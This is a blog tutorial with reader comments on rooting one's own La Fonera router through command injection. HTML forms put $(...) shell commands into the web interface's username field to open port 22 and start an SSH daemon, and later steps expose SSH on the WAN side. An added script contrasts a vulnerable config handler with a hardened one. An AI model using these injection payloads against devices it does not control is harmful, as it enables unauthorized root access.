
Hacking Fonera

Yesterday I received my Fonera. I spent the last two days trying to run an SSH daemon on it. After a lot of searching and surfing, I finally found, with the help of these two sites, a way to force the Fonera to run SSH. I will briefly sum up the hack; it worked successfully with the 0.7.1 r1 Fon firmware (if you have the 0.7.1.2 firmware you have to reset it):
First you have to write two HTML pages which will inject code into your Fon router. Save the following code as step1.html:

<html>
<head>
</head>
<body>
<center>
<form method="post" action="http://192.168.10.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT)" size="68" >
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='";' + this.form.wifimode.value +';"'}" />
</form>
</body>
</html>


Save the next html code as step2.html.

<html>
<head>
</head>
<body>
<center>
<form method="post" action="http://192.168.10.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/etc/init.d/dropbear)" size="68" >
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='";' + this.form.wifimode.value +';"'}" />
</form>
</body>
</html>


Now connect to your MyPlace network, open both pages and just click the "Submit" button (first on the step1.html page, then on the step2.html page). Open your favorite shell and connect to your router via ssh with username root and password admin.
ssh root@192.168.10.1
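
Why a $(...) value in a form field can end up running as a command, shown as an added example that is not part of the original post and not the Fonera's own connection.sh: a hypothetical handler stores a posted field in a file that is later sourced, next to a hardened version that allowlists the value and parses it as data. All function and file names are assumptions, and the sample input is constructed so that it only creates a marker file in a scratch directory.

```shell
#!/bin/sh
# Added illustration: a hypothetical handler, not the Fonera's connection.sh.
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
CONF="$WORK/connection.conf"
MARKER="$WORK/injected"

# Constructed input with the same $(...) shape as the username field above;
# the embedded command only creates a marker file in the scratch directory.
PAYLOAD='$(touch '"$MARKER"')'

save_unsafe() {
    # The value is pasted between double quotes, so $(...) reaches the file intact.
    printf 'username="%s"\n' "$1" > "$CONF"
}

load_config() {
    # Sourcing treats the file as shell code: command substitution runs here.
    . "$CONF"
}

save_safe() {
    # Allowlist check: anything outside plain account-name characters is refused.
    case "$1" in
        ''|*[!A-Za-z0-9._@-]*) return 1 ;;
    esac
    printf 'username=%s\n' "$1" > "$CONF"
}

read_username() {
    # The stored value is parsed as data and never evaluated by the shell.
    sed -n 's/^username=//p' "$CONF"
}

demo_unsafe() {
    rm -f "$MARKER"
    save_unsafe "$PAYLOAD"
    load_config
    [ -e "$MARKER" ]    # succeeds only if the embedded command was executed
}

demo_safe() {
    rm -f "$MARKER" "$CONF"
    ! save_safe "$PAYLOAD" && [ ! -e "$MARKER" ]    # refused, nothing executed
}

demo_unsafe && echo "unsafe handler: embedded command ran"
demo_safe && echo "hardened handler: value refused, nothing ran"
```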

To enable permanent SSH access you have to rename dropbear to S50dropbear:

$> mv /etc/init.d/dropbear /etc/init.d/S50dropbear

In /etc/firewall.user you have to uncomment these lines:

# iptables -t nat -A prerouting_rule -i $WAN -p tcp --dport 22 -j ACCEPT
# iptables -A input_rule -i $WAN -p tcp --dport 22 -j ACCEPT


Now you should prevent Fon from executing received code by editing /bin/thinclient. Comment out the last line and add another line, so that the last two lines look like this:

#. /tmp/.thinclient.sh
cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')


Now you have an SSH daemon on your Fonera.


btw: thanks a lot cologne.idle and "Пожалуйста не пойте под фанеру!"

Trackbacks

Alessandro "jekil" Tanasi blog am : Hacking La Fonera

Today i received my Fonera. Fonera has been designed not to be hacked. Really? Hacking the La Fonera; OpenWrtDocs Hardware; Dd-wrt about La Fonera; La Fonera Flashing; Hacking Fonera; Openwrt K on la Fonera without serial console; La Fonera dissection and hack; Inside th

Coding my Life am : Fonera Downgrade

If you want to downgrade your fonera from 0.7.1.2 firmware to the 0.7.1, look here.


Comments


Aschenbash0r am :

Пожалуйста не пойте под фанеру!
=
Please do not sing under plywood!

I copy&pasted it into an online translator ;-)

kalkin am :

Never trust online translators ;-) .

ARARAT am :

Thanks for the code. It's useful for me. Martin

Chance am :

Now if we can just get some decent firmware with a web interface for this device.

kalkin am :

There are some people who are porting dd-wrt to the Fonera. dd-wrt also has a web interface. For more information look in the dd-wrt forum.

Chance am :

I'm all over it. I just got mine today, and within 5 minutes I was ssh'd in and messing with stuff. I am sure I can get better at the console stuff if I have to use it, but I am lazy and would like a web interface. I have been using DD-WRT for ~2 years and love it so that would be my first choice.
Thanks

matyas am :

Hi,

I have just come across your website. I have received a fonera too, and i have some (maybe stupid) questions: why is it good that i can have an SSH access to my fonera? what is the advantage of that? and why is it good for me that i prevent FON from executing code on my box?

thank you very much

Matyas (from Hungary)

Riku am :

> why is it good that i can have an SSH access to my fonera?

You can access that Linux and make some changes. It's also more secure than just telnet.

> what is the advantage of that?

You can make changes.

> and why is it good for me that i prevent FON from executing code on my box?

It's a security thing. The FON box will execute any code it receives from FON without these hacks.

Jay am :

I don't think I understood the thing about uncommenting the lines in the firewall.
Can anybody help me?

Fabs am :

imho you need to write "cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')", in your code the day will not be written

kalkin am :

Thank you, I edited the line.

geek am :

By the way if you don't want those thinclients filling your Fonera's memory,

instead of this:
#. /tmp/.thinclient.sh
cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')

use this:
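if [ -s /tmp/.thinclient.sh ] ; then
    # Find the most recent saved copy: the glob expands in sorted order,
    # so the last match carries the newest timestamp in its name.
    for f in /tmp/thinclient-* ; do
        :
    done
    if [ -f "$f" ]; then
        # Save a new copy only if the script differs from the last one.
        if [ "$(md5sum < /tmp/.thinclient.sh)" != "$(md5sum < "$f")" ] ; then
            cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')
        fi
    else
        # No earlier copy exists yet.
        cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')
    fi
fi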


This way a new thinclient "log" will only be created if it differs from the last one and if it's not empty. Code isn't probably very beautiful, but it seems to work :-)

kalkin am :

Great idea, thanks. :-)

fon-fan am :

when will dd-wrt be here?
do you have some more information, links to threads on the forum?
am i right that linux 2.6 is the only thing to be ported ?

kalkin am :

http://tinyurl.com/u79m4

There is a forum thread about ddwrt on fonera.

Fabs am :

By the way: Wouldn't it be easier to just remove the cronjob that executes /bin/thinclient every hour? crontab -r?

Late am :

You can remove the crontab, that works too, but it might be interesting to see what the thinclient fetches for you.

futejia am :

Here is another howto http://futejia.blogspot.com/2006/12/my-way-to-hack-lafonera.html
I am waiting for dd-wrt. Yeah!
Btw: the serial console sucks. I tried for more than two hours to use it.

Barol am :

dd-wrt will not be here for a while. But in the meanwhile we have Openwrt ;-) http://www.dd-wrt.com/phpBB2/viewtopic.php?p=49142

Jimmi am :

Leave it alone!
This is something one should support, not hack!

futejia am :

1) Just having ssh access to it doesn't stop the FON software from running
2) I think Google and Ebay have enough money. They don't need our support.

Stefan Tomanek am :

Take a look at this:
http://stefans.datenbruch.de/lafonera/
and especially http://stefans.datenbruch.de/lafonera/whywedidit.shtml

It's not about sabotaging FON, it's about keeping in control of your network.

jarena am :

After doing this, I have SSH access to La Fonera, but I have lost internet connection via wifi. Under wireless networks I can only see my private network, not the public one. Any ideas? :-S

jarena am :

In the end the problem was only that it takes a huge amount of time to get an IP via DHCP, and until it gets one the public network is not visible. I don't know whether it is common for it to take this long, maybe it is, since I read somewhere that the Fonera's flash was very slow, which prolongs the boot time.

jarena am :

Ooops, sorry for using spanish hehe. In English:

At last the problem was La Fonera was taking too long to get an ip via DHCP, and while this is not done the public network can't be seen. I don't know if this is just normal, but I think so, because I read before the flash memory of La Fonera was quite slow, extending startup time.

Maurizio am :

I have the same issue: SSH access but without Internet connection. How can I overcome such slowness of IP assignment by DHCP?

kalkin am :

Does it take long to get an IP when you are booting?

I have the same problem when I'm changing from a fixed IP to DHCP. The change takes really long.
In my experience the best way in these cases is to restart the Fonera.

Maurizio am :

Thank you for your reply.

Normally, the DHCP server on my modem/router assigns IP addresses to other network devices in a few seconds. Besides that, I've tried to restart the Fonera, with no effect.

cable am :

When using a direct cable link, you should change the web server address to 169.254.255.1 instead of 192.168.10.1, both in the html page and the ssh session.

Rui Ponte am :

Users with the release 0.7.1.2 can't do this :-(

kalkin am :

If you got the Fonera with 0.7.1.2 and didn't update it via the web interface, you can reset it to 0.7.1.

You take something spiky (for example a pin) and press the reset button, below the Fonera, for 5 sec. It should be reset to the 0.7.1 firmware.

Torbar am :

Remember to unplug the ethernet cable before resetting the router. Otherwise it will keep on auto updating the firmware back to 0.7.1.2 and you will get nowhere ;-)

Rui Ponte am :

What if i've updated via webinterface?

Stefan Tomanek am :

Then you lose. Sorry, no more resets for you, the new firmware has been flashed permanently.

There is a new hack (this time called "kolofonium"), however we are not releasing it until 0.7.1.2 has become widespread on new routers - otherwise, it would be wasted

Paul am :

any estimate on when this might be available? 7.1.2 is rapidly becoming pretty widespread, what with the free 10,000 routers that went out earlier this month (of which i got mine yesterday, woohoo!).

Tiago am :

I installed dd-wrt on my fonera, but yesterday I installed the original fon firmware. I downloaded the fonera.tar.gz file, which someone told me is fonera firmware version 0.7.1-r1 but with the first 519 bytes cut. But when I flashed the fonera and accessed the web interface I saw that the firmware is 0.7.1-r2. I tried to reset the fonera but it didn't change the firmware to 0.7.1-r1. Can I do something to hack the fonera? I don't have a serial cable :s

Stefan Tomanek am :

Get a serial cable or wait until our new hack "kolofonium" is released. We are still waiting for widespread distribution of 0.7.1.2

Michael Henn am :

How do I edit this file? /etc/firewall.user

Thanks for any help from anyone!

sp00nix am :

vi /etc/firewall.user
google the VI command list, it's kinda confusing how to work

narmacil am :

check this out: this is an error message I get when trying to SSH in... Any idea how to get around this?

@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
23:55:f0:ec:9e:61:24:e8:8e:a5:0d:79:f0:85:65:64.
Please contact your system administrator.
Add correct host key in /home/Administrator/.ssh/known_hosts to get rid of this
message.
Offending key in /home/Administrator/.ssh/known_hosts:1
RSA host key for 192.168.10.1 has changed and you have requested strict checking
.
Host key verification failed.

narmacil am :

nevermind - it was the ssh client on my side, my bad.

Smiley am :

I'm trying to do this on my Mac (10.4.8-) but the basic html just stays like that and won't display. I've tried to open step1/2 in Safari, Firefox, Opera, Realplayer. Seems such a simple thing to do but maybe OSX now blocks HTML somehow?

kalkin am :

I'm using Tiger too, but I have no problems.

Josh am :

OMFG NEED NEW RELEASE FOR 1.7.1.2 HELP THIS ISN'T WORKED!!

kalkin am :

Look here: http://mrmuh.blogspot.com/2007/01/codename-kolofonium-realease-date.html

Antonio am :

Hi everybody. I wrote a script that transforms La Fonera as a Repeater and Access Point, you can find it at http://www.blogin.it/fonera4.php
Hope you enjoy ...and improve

Antonio

Wenle am :

i have a problem, when i type in the first line of code:

$> mv /etc/init.d/dropbear /etc/init.d/S50dropbear

it responds -ash: $: not found

what does that mean? should i continue to second command?

kalkin am :

You have to enter the commands without $>. Just enter:
mv /etc/init.d/dropbear /etc/init.d/S50dropbear

Takenover83 am :

Does anyone have a fix for losing Internet once the SSH mod has been installed?

I have my Fonera hooked up to a WRT54GS.


Also what local webservers work ok with this guide? I tried a couple, but got errors when using wget.

For example.

Using "wget http://127.0.0.1/nameofthefile" just gives me a forbidden type of error.

But when I test the same link in a webbrowser, the webserver works just fine and allows me to download.

Paul am :

i was able to restore internet connectivity by logging into my fon's web interface, and configuring the 'internet connection' for static IP. doesn't matter what you configure it to - use 55.55.55.55 if you like - but fill in all the fields, and click 'submit'. then go right back to the configs, and reset it back to DHCP. that was enough to force to grab onto my main router and talk to the world again.

Paul am :

i also wanted to note that if your fon says it's 7.1.2, be sure and go through coldtobi's instructions. http://blog.coldtobi.de/index.php?op=ViewArticle&articleId=7&blogId=1
i was absolutely convinced that my router was 7.1.2 firmware, but after pulling my fon open (easy!) and looking, yup, 7.1.1. use coldtobi's page to reset the right way, and you'll be able to play soon yourself!

john earthquake am :

i've changed the fonera firmware...but now when i try to run the 2 pages it keeps asking me for a username and a password...any idea ? thank you :-D

kalkin am :

Reading carefully helps. User: root Password: admin. ;-)

Popup2u am :

can help me hack my router 202.129.51.122

dltv am :

does the heartbeat option work in DDWRT or do i need to get an advanced script?

Most importantly can you connect to the router via the Ethernet port with DDWRT? or does it have to be wirelessly? because i cant connect to 192.168.1.1

or whatever the right ip is i still cant connect to the DDWRT interface via ethernet cable only wirelessly

Wrote a tutorial on hacking it at dltv.wordpress.com

grazzt am :

Is it possible to do these things with only the fon connected to a network card via the network cable?

I don't have any wifi cards yet.

I see the 192.168.* is for the wifi side.

The manual states to set static ip for nic to 169.254.255.2. When I do this, I can check the status of the fon by going to http://169.254.255.1 (and showing 0.71 r1 as the firmware).

Any help would be appreciated.

Thanks

grazzt am :

Sorry, for not reading, I see what to do with only a network cable and no wifi.

And it worked! :-)

ssd am :

i have followed the instructions here and here [http://www.dd-wrt.com/wiki/index.php/LaFonera_Software_Flashing]. after doing step 3 and rebooting the wireless on the router stopped working. how do i get it to enable again? reset button doesn't work :-(

yea am :

Same here. After step 3 and rebooting the router just sits there and does nothing. I am not able to ssh or telnet into it. It is bricked.

dna am :

where can i get the firmware version 0.7.1 ?

anyone send me e-mail that attached it?

kalkin am :

yoda voice : Google you ask have to!

:-D

jeff am :

get the firmware 7.1 at the DD-WRT wiki on the la fonera its at the bottom of how to flash

Muhammad Waqas am :

plz tell me simple way that how can i get ip address or how can i use other computer from my computer plz i m very much fond of use the other computer from my plz plz plz plz.

dltv am :

Read http://dltv.wordpress.com/off-the-wall/a-guide-to-hacking-the-la-fonera-wireless-router/

Gives some networking advice.

grazzy am :

For those just using a normal nic and NO wifi, the "hacked" fon will default to DHCP for the wan ip. That is, connect your hacked FON to your computer, and have your computer run a DHCP server (in linux this is easy, under windows, who knows).

Then the FON listens to port 8080 on the wan side.

Hope this helps anyone.

Jürgen am :

Great Post. Very helpful information. Thanks a lot. Jürgen from Germany. :-)

Strafverteidiger München am :

This is great:

http://dltv.wordpress.com/off-the-wall/a-guide-to-hacking-the-la-fonera-wireless-router/

But as well a helpful information.

eric am :

For those that are interested, here’s a site with great tutorials with screenshots for the newer Fonera firmware version 0.7.2-r3. It has guides for Redboot and flashing to DD-WRT and Legend firmware along with some other cool stuff.

http://www.fonerahacks.com

kenjiru am :

I've got to firmware version 0.7.1 r2, but no ssh :-(

Any idea what to do now?

Computmaxer am :

Ya'll should come check out the fonera-hacking community:
www.fonerahacks.com

nglrossi am :

Thanks for the clear howto, just hacked mine.
I am about to install dd-wrt now.

Angelo

Johnny am :

any chance to enable ssh on 0.7.1 r3 ?
